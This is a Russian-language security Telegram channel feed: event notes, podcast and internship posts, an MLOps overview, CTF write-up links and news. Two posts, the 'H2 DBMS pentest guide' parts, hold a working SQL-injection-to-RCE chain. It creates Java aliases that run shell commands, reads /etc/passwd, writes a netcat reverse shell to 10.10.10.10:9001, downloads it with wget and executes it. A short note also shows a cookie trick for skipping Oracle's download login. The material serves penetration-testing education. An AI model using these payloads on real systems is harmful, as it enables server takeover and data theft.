14582
All materials published on the channel are for educational and informational purposes only. Чат: @poxek_chat Рекламный менеджер: @not_savely Купить рекламу: https://telega.in/c/poxek РКН: https://clck.ru/3FsVhp
Гайд по пентесту СУБД H2. Вторая часть
#H2 #Java #pentest #research #SQLi
ЧАСТЬ 1 - ЧАСТЬ 2
2️⃣ Удобный, но более жирный по коду вектор
Ещё в прошлом примере мы делали unalias на возможно существующую команду, на всякий случай. Теперь же мы создадим свой alias и будем его использовать.
CREATE ALIAS EXEC AS
'String e(String cmd) throws java.io.IOException {
// Формируем массив аргументов для выполнения команды в bash:
String[] c = {"/bin/bash", "-c", cmd};
// Запускаем процесс с указанной командой
Process p = Runtime.getRuntime().exec(c);
// Получаем поток вывода (stdout) запущенного процесса
java.io.InputStream stdIn = p.getInputStream();
// Оборачиваем InputStream в InputStreamReader для чтения символов
java.io.InputStreamReader isr = new java.io.InputStreamReader(stdIn);
// Оборачиваем InputStreamReader в BufferedReader для построчного чтения
java.io.BufferedReader br = new java.io.BufferedReader(isr);
// Переменная для накопления всего вывода команды
String result = "";
// Временная переменная для чтения текущей строки
String line = "";
// Считываем строки из вывода процесса до тех пор, пока они есть
while ((line = br.readLine()) != null)
// Добавляем каждую строку к результату (без перевода строки)
result += line;
// Возвращаем весь накопленный вывод команды как одну строку
return result;
}';
something' CALL EXEC('cat /etc/passwd'); --# сначала пишем на rev shell в файл. Как пример:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.10 9001 >/tmp/f" > shell.sh
python3 http.server в папке, где хранится shell.shCALL EXEC('wget http://10.10.10.10:8080/shell.sh -O /tmp/shell.sh');CALL EXEC('chmod +x /tmp/shell.sh');CALL EXEC('bash /tmp/shell.sh');
Как AI-ассистенты открывают всему миру вашу почту и календарь
Всем привет!
Сегодня безумно популярна тема различных AI-агентов и в частности персональных AI-помощников, эдаких «Джарвисов» на минималках.
Эти помощники умеют читать и отправлять почту, ставить встречи в календарь и напоминать нам о них. И все это через удобный и привычный Телеграм!
Офигенно удобно, полезно и всячески ускоряет и упрощает нам жизнь! Если бы не одно но..
О том как создать такого ассистента и подключить его к своей почте есть огромное количество материалов, особенно видео на Youtube. Я посмотрел 10 наиболее популярных видео, у которых в сумме набирается около 700 000 просмотров.. И во всех есть один и тот же косяк!
Из-за неправильной настройки телеграм-тригера написать вашему «Джарвису» может кто угодно! И абсолютно также получить данные о письмах, контактах, встречах, написать письмо всем контактам и т.д. Любой человек, кто найдет вашего бота может получать любые данные! А учитывая, что многие сервисы осуществляют сброс пароля через подтверждение на почту, это может быть еще интереснее!!
Одна маленькая, скрытая настройка ставит под очень большой удар всю конфиденциальную информацию, что у нас есть 🎉
Я написал об этом небольшую статью и даже записал коротенькое видео, которое показывает, как это работает!
Надеюсь вам будет интересно узнать поподробнее, как это работает и как сделать вашего «Джарвиса» только вашим :)
До связи!
#aishe4ka #aiassistant #n8n
Подборка райтапов на #bootcamp #standoff365
🗂️Задание
- [web-1-1] Удаленное выполнение кода (RCE) на узле library.edu.stf
- [web-1-2] Локальное повышение привилегий (LPE) на узле library.edu.stf
➡️Райтап
[/channel/writeup_ctf/225]
🗂️Задание
- [web-3-1] Подделка запроса со стороны сервера (SSRF) на узле utils.edu.stf
➡️Райтап
[/channel/writeup_ctf/265]
- [web-3-2] Удаленное выполнение кода (RCE) на узле utils.edu.stf
➡️Райтап
[/channel/writeup_ctf/264]
🗂️Задание
- [web-4] Удаленное выполнение кода (RCE) на узле shop.edu.stf
➡️Райтап
[/channel/writeup_ctf/282]
🗂️Задание
- [web-5] Внедрение SQL-кода (SQLi) на узле tokenizer.edu.stf
➡️Райтап
[/channel/writeup_ctf/233]
🗂️Задание
- [web-6] Удаленное выполнение кода (RCE) на узле smashmusic.edu.stf
➡️Райтап
[/channel/writeup_ctf/450]
БОНУС: райтапы на категорию #infra
[/channel/writeup_ctf/282]
💬 Канал & Чат | 📺 RUTUBE | 📺 writeup_ctf?si=TX1b4ep75lAYIh7a">YouTube
Михаил Кожуховский, Flowmaster. "Чем собирать контейнеры если вы параноик?".
Читать полностью…
Продолжаем! Альмир Сарваров, Банк ДомРФ. "Тонкая настройка безопасности OS Linux для контейнеров: вредно и полезно"
Читать полностью…
БЕКОН 2025
Хорошая локация, даже тут знакомых встретил)
Что очень удобно, 1 трек и не надо никуда бегать за докладчиками.
На удивление довольно много людей, но в целом какой-то толпучки нет, стенды удобно расставлены.
Классный мерч в большинстве, возьму себе пару идей на вооружение)
А еще стащил кучу стикеров, которые буду вам раздавать на мероприятиях, которую буду посещать))
Всем привет! Долго думал над этой темой. Мой канал - это сообщество, что я смог объединить вокруг одной идеи, а это было нелегко подружить множество маленьких интровертиков в большую кампанию людей, которая будет каждый день заходить на канал и читать посты, а более смелые еще и общаются в чате.
Канал веду в соло 4 года, от чего начал уставать последнее время. Скорее не так... У меня банально закончились идеи о чем еще написать, поэтому я прошу помощи у вас.
Если у вас есть какие-то классные темы, но вам не хватает мотивации их дописать или внешней критики, вы не знаете куда выложить, думаете что её не заметят и любые другие отмазки, чтобы не поделиться своими знаниями, то я предлагаю свой канал в качестве площадки для публикации контента. Я знаю, что у меня есть множество талантливых и трудолюбивых подписчиков, которые имеют идеи для контента, но сами его не пишут по различным причинам. Собственно это тот самый шанс, чтобы круто самореализоваться)
Win2Win:
1. Вы получаете огласку, как специалиста. Вы можете поделиться своим мнением, ресерчем, может какой-то интересной идеей. Это отличная возможность засветится. В мое время такого не было)
2. Я получаю помощь в развитии и поддержке канала.
Первоначально я ищу людей, которые также горят схожими идеями в прокачке ИБ сообщества в России. Мне не интересно работать с айтишными контент менеджерами, SMM или людьми, которые нагенерят мне идей или контента через нейросети (я это и без вас могу сделать). Если мы с вами сработаемся в перспективе, то я с радостью буду вам платить.
Канал развивался всегда с ходом моих интересов. Думаю пришло время попробовать для себя что-то новое - делегирование) и посмотреть, что из этого выйдет.
Банальные правила по идеям для статей: никаких гайдов, как за 5 минут взломать ватсап/вк, гайд как взламывать wifi со смартфона и т.д. Если это очевидный материал, который уже лет 20 есть в интернете, то такое не интересует. За спам или какие-то блечерские истории, буду выдавать бан. Уважайте свое и мое время)
Писать @szybnev
Стажировка в InfoJet
#стажировка
https://jet.su/securitystart/
26 мая – 16 июня Регистрация
————————
Я не знаю почему ко мне не пришли их SMM, хотя я специально попросил их об этом. Это не реклама, мне не платили, я просто хочу поддержать коллег и чтобы мои подписчики, кто еще не работают, а хотят - наконец нашли своё месте в какой-нибудь компании)
P.s. на будущее для всех компаний, кто делает стажировки по кибербезу, приходите ко мне в ЛС @szybnev и обсудим как можно пропиарить вашу стажировку
Пентест провайдера. Как цепочка классических багов привела к полной компрометации
#RCE #pathtraversal #killchain
В этой статье автор поделится историей одного из выполненных мной проектов, который показал, что даже в наше время встречаются простые и базовые уязвимости, грамотное сочетание которых может привести к RCE.
🎙🎙🎙🎙 Принято в работу! | Елизавета Дудко и Вячеслав Муравьев Т-Банк Bug-Bounty
#подкаст #tbank #тбанк #багбаунти #bugbounty
В этом выпуске Сергей Зыбнев (@poxek) беседует с экспертами триажа уязвимостей из Т-Банк:
➡️Елизавета Дудко — Руководитель Т-Банк Bug-Bounty
➡️Вячеслав Муравьев — Триажер Т-Банк Bug-Bounty
Подкаст будет интересен:
➡️Специалистам по кибербезопасности
➡️Компаниям, которые собираются выйти на багбаунти
➡️Всем, кто хочет узнать больше о bugbounty, за какие баги много платят
➡️Тем кто хочет получить промокод на выплаты в Т-Банке
В этом подкасте мы обсудили:
➡️Процесс триажа в Т-Банк
➡️Как формируются выплаты
➡️Почему команда триажа это не просто ИБ техподдержка со стороны вендора
➡️Что у триажеров тоже есть сердце и они любят понятные отчёты
➡️Пару слов о Т-Банк CTF
➡️О привлечении новых багхантеров
➡️Раскрытие отчётов
Ссылки:
💬 Слушать в Telegram
📹 YouTube
📺 RuTube
💙 VK Видео
🎵 Apple Podcasts
🎵 Яндекс.Музыка
☕️ Mave
Обязательно смотрите до конца! Подписывайтесь и погружайтесь в мир триажа уязвимостей!
🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч (sold out)
Друзья, это свершилось! 😱✨
Честно? Мы сами до конца не верили, что этот день настанет... но она — в печати!
Да-да, наша книга теперь существует в реальном, бумажном формате 📖🔥
Уже завтра мы забираем первую партию, и поверьте, она выглядит круче, чем мы ожидали!
А совсем скоро вы тоже сможете её заказать — предзаказ уже на подходе 👀
Следите за новостями, будет кое-что интересное… Может быть, даже небольшой сюрприз для первых заказов?🤔
👀@ever_secure
ВСЕ ПО ИБ | Про стажировки, трудоустройство, обучение и карьеру в инфобезе
#стажировка #трудоустройство #обучение #карьера #кибербез #работа #hh #intern #junior #бастион
В новом выпуске подкаста гости обсудят старт карьеры начинающего специалиста информационной безопасности: как стажировки помогают набраться ценного опыта, дадут советы для успешного прохождения собеседования, расскажут о популярных и перспективных направлениях и к чему стоит готовиться после трудоустройства.
➡️Оля Борисова — рекрутер @ollya_bk
➡️Дима Власов — инженер-разработчик @Dmitriy_A_Vlasov
➡️Яна Ксендзовская — руководитель группы образовательных программ @yanchiklove
➡️Альбина Семушкина — руководитель рекрутинга @AlbinaSema
Основные темы выпуска:
➡️Стажировки
➡️Подготовка студентов
➡️ИИ
➡️Собеседования
➡️Зарплаты
➡️Непопулярные направления
➡️Советы для начинающих
➡️Рынок труда
Смотреть бесплатно без регистрации:
💙 ВК
📺 YouTube
📺 Rutube
Таймкоды есть в описании под видео.
Слушать:
🎵 Яндекс.Музыка
🎵 Звук
🎵 ВК
💬 Телеграм
🔗 Полезные ссылки и предыдущие выпуски
p.s. а ещё там очень прикольное интро)
🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч (sold out)
Расскажите о ваших впечатлениях о PHD и/или Standoff 15 без преукрас
Читать полностью…
Гайд по пентесту СУБД H2. Первая часть
#H2 #Java #pentest #research #SQLi
ЧАСТЬ 1 - ЧАСТЬ 2
Родители, закройте детям глаза, дальше будет Java)
➡️Начнём с теории:
H2 — это легковесная, кроссплатформенная система управления реляционными базами данных с открытым исходным кодом, полностью написанная на Java. Она может работать как во встроенном режиме (embedded), так и в режиме клиент-сервер, поддерживает хранение данных в памяти (in-memory) и на диске, что делает её идеальным выбором для разработки, тестирования и небольших production-проектов.
Я думаю большинство с ней никогда не сталкивалось, вот и я вчера впервые с ней повстречался. В ходе ресерча ноликов ноликов в одном Java проекте, я дошёл до потенциальной SQLi и я решил сразу пойти покрутить SQLi > RCE. Попробовав дефолтные векторы из постгри (чисто на рефлексе), понял что оно не работает(
Пошёл читать доку и оказалось, что прямого вектора до RCE, как в популярных СУБД типа PostgreSQL или MySQL - нет. Пошёл читать доку и ...пригрустнул, т.к. судя по сайту, мне предстояла попа-боль и костыльные извращенства, что собственно и произошло.
Верификация наличия SQLi идёт по классике:
something' OR 1=1; --
# Получаем 200 OK
something' OR 1=2; --
# Получаем ошибку
import java.io.IOException;
public class Main {
public static void main(String[] args) throws IOException {
// Вызываем метод shell_exec() и выводим результат в консоль
System.out.println(shell_exec());
}
static String shell_exec() throws java.io.IOException {
// Выполняем команду "id" и создаём Scanner для чтения её вывода
java.util.Scanner cmd_output = new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A"); // Устанавливаем разделитель так, чтобы Scanner читал весь ввод целиком
// Если есть данные в выводе команды, возвращаем их, иначе — пустую строку
return cmd_output.hasNext() ? cmd_output.next() : "";
}
}
something' OR 1=1; DROP ALIAS IF EXISTS exec_cmd; CREATE ALIAS exec_cmd AS 'String shell_exec() throws java.io.IOException {
java.util.Scanner cmd_output = new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\\\A");
return cmd_output.hasNext() ? cmd_output.next() : "";
}'; UPDATE comments SET comment = exec_cmd() WHERE id = 13c60101-8142-42df-bebd-fb5905673c41; --id, но если что-то не сработало, то будет пустой комментарий. Почему может не сработать? Возможно урезанное окружение, а может права выставлены корректно и СУБД не может выполнять системные команды. Попробуйте другие команды, если вдруг не получилось.
#note
Oracle давно закрыла возможность скачивания своих файлов без авторизации. Я сейчас снова с этим столкнулся и нашёл способ, как это обойти:
1. Простой способ. Обход через куку
wget -c --no-cookies --no-check-certificate --header "Cookie: oraclelicense=accept-securebackup-cookie" https://download.oracle.com/java/17/archive/jdk-17.0.12_linux-x64_bin.tar.gz
Эти доклады отметил для себя как полезные и годные. Но другие доклады тоже хороши.
На самом деле давно не был на конфе, когда не понимаешь даже половину слов спикера и ... меня это радует, т.к. это значит есть развиваться)
Следующий спикер уже на сцене! Дмитрий Рыбалка, Lamoda Tech. "Talos Linux в production: без SSH и с удовольствием".
Читать полностью…
Дмитрий Евдокимов переходит к своему докладу: "Неочевидные и непонятные моменты безопасности Kubernetes".
Читать полностью…
Reverse Engineer Android Apps for API Keys
#android #reverse #RE #mobile #pentest #API
Статья с pwn.guide посвящена основам реверс-инжиниринга и цифровой криминалистики (форензики) приложений под Android. В ней рассматриваются ключевые этапы анализа мобильных приложений, важные инструменты и практические советы для начинающих и опытных специалистов по информационной безопасности.
➡️Основные моменты статьи:
➡️Описывается структура Android-приложений (APK-файлов), их компоненты и способы упаковки.
➡️Даётся обзор инструментов для реверса и форензики Android, включая такие популярные решения, как Apktool, Androguard, jadx, а также специализированные forensic-утилиты вроде androick и backhack.
➡️Пошагово разбирается процесс декомпиляции APK-файла, извлечения ресурсов, анализа манифеста и кода, поиска уязвимостей и вредоносных функций.
➡️Приводятся советы по анализу разрешений, трекеров и подозрительных библиотек, а также по выявлению признаков компрометации или вредоносной активности.
➡️Рассматриваются методы динамического анализа, включая запуск приложения на эмуляторе, мониторинг сетевых запросов и взаимодействие с файловой системой.
Даются рекомендации по автоматизации анализа с помощью скриптов и интеграции различных инструментов.
➡️Необходимый тулинг
Android Studio — For running and testing APKs.
ADB — For interacting with Android devices or emulators.
APKTool — For decompiling and recompiling APKs.
JADX — For decompiling APKs to Java source code.
HTTP Toolkit — For intercepting and analyzing HTTP/HTTPS traffic.
Кому будет полезна статья:
Материал рассчитан на специалистов по кибербезопасности, исследователей вредоносных программ, а также всех, кто интересуется анализом безопасности мобильных приложений Android.
🔗 Читать далее
🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч
🔎 Эксперты Curator обнаружили крупнейший DDoS-ботнет — 4,6 миллиона устройств
16 мая специалисты Curator зафиксировали и нейтрализовали масштабную DDoS-атаку, в которой использовался огромный ботнет — крупнейший за всю историю наблюдений. Он включал 4,6 млн устройств — это в разы превышает рекорды прошлых лет: для сравнения, в 2023 году — 136 тыс. устройств, а в 2024 — 227 тыс.
Атака проходила в несколько этапов:
⚡️ На первом этапе — чуть больше 2 млн устройств
⚡️ На втором — еще 1,5 млн
⚡️ На третьем — дополнительно 1 млн устройств, всего 4,6 млн
С данным ботнетом эксперты компании Curator уже сталкивались ранее в этом году — тогда его размер составлял 1,33 млн устройств. Сейчас он вырос более чем втрое, что свидетельствует о его активном развитии и повышении угрозы.
🌍 География ботнета:
🇧🇷 Бразилия — 1,37 млн устройств
🇺🇸 США — 555 тыс.
🇻🇳 Вьетнам — 362 тыс.
🇮🇳 Индия — 135 тыс.
🇦🇷 Аргентина — 127 тыс.
Такой ботнет обладает потенциалом генерировать десятки миллионов запросов в секунду. Подобная нагрузка может запросто вывести из строя любой онлайн-ресурс. Не каждый провайдер DDoS-защиты сможет с ней справиться.
👉 Оставайтесь на шаг впереди угроз — следите за новостями и аналитикой в канале Curator
Реклама: ООО "ЭЙЧ-ЭЛЬ-ЭЛЬ", ИНН 7704773923
ИИ обошел 90% команд на соревновании хакеров
Исследователи из Palisade Research (это те, у которых недавно выходило вот это громкое исследование про саботаж моделей) сделали специальный AI-трек на двух недавних соревнованиях Capture The Flag от крупнейшей платформы Hack The Box. Суммарно участие принимали почти 18 тысяч человек и 8 500 команд. Из них несколько полностью состояли из ИИ-агентов. Вот что вышло:
➖ В первом небольшом соревновании (≈400 команд) четыре из семи агентов решили по 19 из 20 задач и вошли в топ 5 % участников
➖ Во втором большом CTF (≈8 000 команд) лучшему ИИ-агенту удалось захватить 20 флагов из 62 и оказаться в топ-10%
➖ При этом агенты справляются почти со всеми задачами, на которые человек тартит до часа времени, и делают это в разы быстрее
Одинаково неплохо моделям удавались и задачи на взлом шифра, и веб-взломы, и форензика, и эксплуатация уязвимостей 💀
Ну и экономический эффект тоже на месте. Если принять во внимание, что на одну команду из топ-5% обычно уходит не менее нескольких сотен человеко-часов на подготовку, анализ и написание эксплойтов, то даже самый дорогой агент, который работал 500ч, в итоге обошелся дешевле, чем 10 таких живых команд.
arxiv.org/pdf/2505.19915
Основные этапы MLOps
Процесс разработки и внедрения моделей машинного обучения в промышленную среду состоит из нескольких ключевых этапов: постановка задачи, разработка модели и её последующее сопровождение. Каждый из этапов предполагает использование специфических подходов и инструментов.
1. Постановка задачи
На этом этапе определяются:
✅ Бизнес-требования и критерии успеха внедрения.
✅ Метрики качества модели в зависимости от типа задачи:
✅ Классификация: Accuracy, Precision, Recall, F1-score, AUC-ROC.
✅ Регрессия: RMSE, MAE, R².
✅ Рекомендательные системы: Hit Rate, NDCG.
✅ Анализ доступных данных, включая их объём, качество и потенциальные ограничения (регуляторные требования или hardware-ограничения).
2. Разработка модели
Этап включает:
✅ Предобработку данных: очистку, нормализацию, работу с пропусками и выбросами.
✅ Feature Engineering: генерацию и отбор признаков (например, с помощью PCA, feature importance из деревьев или автоэнкодеров).
✅ Обучение и валидацию моделей: подбор алгоритмов, кросс-валидацию, оптимизацию гиперпараметров (GridSearch, Optuna, HyperOpt).
Инструменты:
✅ Классические ML: Scikit-learn, XGBoost, LightGBM, CatBoost.
✅ Глубокое обучение: TensorFlow, PyTorch, Keras.
✅ AutoML: H2O.ai, AutoGluon, TPOT.
✅ Экспериментирование: MLflow, Weights & Biases (W&B), Neptune.ai.
3. MLOps: внедрение и эксплуатация моделей
После разработки модель необходимо развернуть в production-среде, обеспечить её мониторинг и поддержку. Ключевые задачи:
Деплой моделей:
✅REST API: FastAPI, Flask.
✅ Сервисы для ML: TensorFlow Serving, TorchServe, ONNX Runtime.
✅ Kubernetes-решения: Seldon Core, KServe, BentoML.
✅ Демо-интерфейсы: Streamlit, Gradio.
Оркестрация и управление пайплайнами:
✅ Airflow, Prefect, Argo Workflows, Metaflow.
✅ Хранение данных и признаков:
✅ Delta Lake, Hopsworks, Feast (Feature Store).
Мониторинг:
✅ Метрик и логирования: Prometheus + Grafana, ELK Stack.
✅ Дрейфа данных: Evidently AI, WhyLogs, Arize AI.
✅ Трассировки: OpenTelemetry, DVC.
CI/CD для ML:
✅ GitHub Actions, GitLab CI, Jenkins.
MLOps обеспечивает непрерывную интеграцию моделей в production, автоматизирует их обновление и гарантирует стабильность работы в реальных условиях. Это критически важный этап, связывающий Data Science и инженерные практики.
#MLOps
Думаю тоже сняться в подкасте Бастиона. Какую тему вам было бы интересно послушать?)
Мы набрейнштормили тему. Спасибо тем, кто включился в обсуждение!
Тема обещает быть интересной и такого раньше не видел, чтобы записывали 🌚
Антон (skavans) Субботин - из Web2 в Web3, 500.000$ на bug bounty, санкции и жизнь после них.
Антон (@skavans) Субботин — автор блога @BugBountyPLZ и один из успешных исследователей СНГ, сумевший заработать более 500. 000 $ на платформе HackerOne. Из-за санкций в отношении исследователей из санкционных регионов Антон был вынужден сменить фокус с классического поиска уязвимостей в Web2 на более сложный и не менее интересный Web3. Об этом и о многом другом мы постарались поговорить в этом выпуске.
Полезные ссылки:
1. Mastering Ethereum:
https://ethereumbook.ru/
2. How to Defi:
https://assets.coingecko.com/books/how-to-defi/How_to_DeFi_Russian.pdf (Beginner)
3. Zokyo Auditing Tutorials:
https://zokyo-auditing-tutorials.gitbook.io/zokyo-tutorials
4. Code4rena репорты:
https://code4rena.com/reports
5. AI-расширение от Сергея Боброва
/channel/Black4Fan/17
🔗 Смотреть подкаст
🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч (sold out)
Я если что сегодня не поехал, т.к. вчера раздал весь мерч и срубился без сил ночью)
Вчера кстати офигенно прошел Похек Chill. Поели хинкалей, хачапури и выпили на 100к ₽ 😏, да и все кайфанули, было вкусно и не было проблем с кухней как в прошлом году
Т.к. мерча я раздал много, то ловите тех кто в Poxek или Bughunter и тусите вместе, если вам скучно или одиноко)